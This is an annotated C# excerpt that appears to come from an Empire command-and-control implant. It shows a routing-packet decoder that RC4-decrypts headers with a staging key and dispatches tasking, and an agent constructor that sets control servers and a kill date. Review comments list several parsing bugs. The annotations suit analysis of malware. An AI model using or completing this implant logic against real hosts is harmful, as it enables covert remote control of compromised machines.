////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Walks a received buffer as a sequence of 20-byte routing headers, each
/// followed by a body, and passes the body to <c>processTaskingPackets</c>
/// when the header's session ID equals this instance's <c>sessionId</c>.
/// </summary>
/// <remarks>
/// Header layout as this method reads it: bytes 0-3 are an initialization
/// vector and bytes 4-19 are the encrypted routing block. In the decrypted
/// block, bytes 0-7 are the session ID (decoded as UTF-8) and bytes 12-15
/// are the body length (read with BitConverter.ToUInt32).
/// The RC4 key is built from the per-packet IV and <c>stagingKeyBytes</c>.
/// Errors raised while processing a body are reported through
/// <c>WriteOutputBad</c> and do not stop the loop.
/// </remarks>
/// <param name="packetData">Raw buffer to parse; dereferenced without a null check.</param>
/// <param name="jobTracking">Stored into <c>this.jobTracking</c> before parsing starts.</param>
internal void decodeRoutingPacket(byte[] packetData, ref JobTracking jobTracking)
{
    this.jobTracking = jobTracking;

    // A buffer shorter than one routing header is ignored silently.
    if (packetData.Length < 20)
    {
        return;
    }

    Int32 offset = 0;
    while (offset < packetData.Length)
    {
        // Take() yields fewer than 20 bytes when the buffer ends mid-header.
        byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray();
        byte[] routingInitializationVector = routingPacket.Take(4).ToArray();
        // NOTE(review): this slices packetData from its start (bytes 4-19), not
        // routingPacket, so the IV taken at `offset` is paired with the first
        // header's encrypted block on every iteration - confirm whether
        // routingPacket was intended.
        byte[] routingEncryptedData = packetData.Skip(4).Take(16).ToArray();
        offset += 20;

        // Key = per-packet IV combined with the staging key bytes
        // (presumably a concatenation; Misc.combine is not shown here).
        byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKeyBytes);
        // The helper named rc4Encrypt is applied to the encrypted block to get
        // the plaintext; that matches RC4 being symmetric, assuming the helper
        // is plain RC4 - verify against EmpireStager.
        byte[] routingData = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData);
        String packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray());
        try
        {
            // NOTE(review): both locals are scoped to this try block and never
            // used; they are also read from the still-encrypted routingPacket
            // rather than from routingData.
            byte language = routingPacket[8];
            byte metaData = routingPacket[9];
        }
        catch (IndexOutOfRangeException error)
        {
            // Reached when a truncated trailing header has fewer than 10 bytes.
            WriteOutputBad(error.ToString());
        }
        // Not used again in this method.
        byte[] extra = routingPacket.Skip(10).Take(2).ToArray();
        UInt32 packetLength = BitConverter.ToUInt32(routingData, 12);
        // NOTE(review): packetLength is unsigned, so this comparison is never
        // true and the break cannot fire. The length is not checked against
        // the bytes remaining in packetData.
        if (packetLength < 0)
        {
            break;
        }
        if (sessionId == packetSessionId)
        {
            // NOTE(review): the Take() count is offset + packetLength - 1, not
            // packetLength; Take() clamps to the bytes available, so the slice
            // can run past this packet's body into whatever follows it.
            byte[] encryptedData = packetData.Skip(offset).Take(offset + (Int32)packetLength - 1).ToArray();
            // NOTE(review): a length above Int32.MaxValue becomes negative after
            // this cast when compiled unchecked (the C# default), which would
            // move offset backwards - confirm the build settings.
            offset += (Int32)packetLength;
            try
            {
                processTaskingPackets(encryptedData);
            }
            catch (Exception error)
            {
                // Any failure in tasking processing is logged and the loop continues.
                WriteOutputBad(error.ToString());
            }
        }
        // NOTE(review): when the session IDs differ, offset is not advanced past
        // the body, so the next iteration parses body bytes as a routing header.
    }
}
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Initializes the agent state: records the session ID, sets the default
/// response and kill date, splits the server list, and constructs the
/// <c>Coms</c> and <c>JobTracking</c> instances.
/// </summary>
/// <param name="stagingKey">Passed through to the <c>Coms</c> constructor; not stored by this constructor.</param>
/// <param name="sessionKey">Passed through to the <c>Coms</c> constructor; not stored by this constructor.</param>
/// <param name="sessionId">Stored in <c>this.sessionId</c> and passed to <c>Coms</c>.</param>
/// <param name="servers">Comma-separated server list; dereferenced without a null check.</param>
public Agent(String stagingKey, String sessionKey, String sessionId, String servers)
{
    this.sessionId = sessionId;
    defaultResponse = "";

    // Local wall-clock time of the host, not UTC.
    killDate = DateTime.Now;
    // NOTE(review): DateTime.AddYears returns a new value and does not modify
    // the instance; the result is discarded here, so killDate stays at the
    // construction time. Analysts reading this value should not assume a
    // one-year window.
    killDate.AddYears(1);

    // Split(',') keeps empty entries and does not trim whitespace around names.
    controlServers = servers.Split(',');

    coms = new Coms(sessionId, stagingKey, sessionKey, controlServers);
    jobTracking = new JobTracking();
}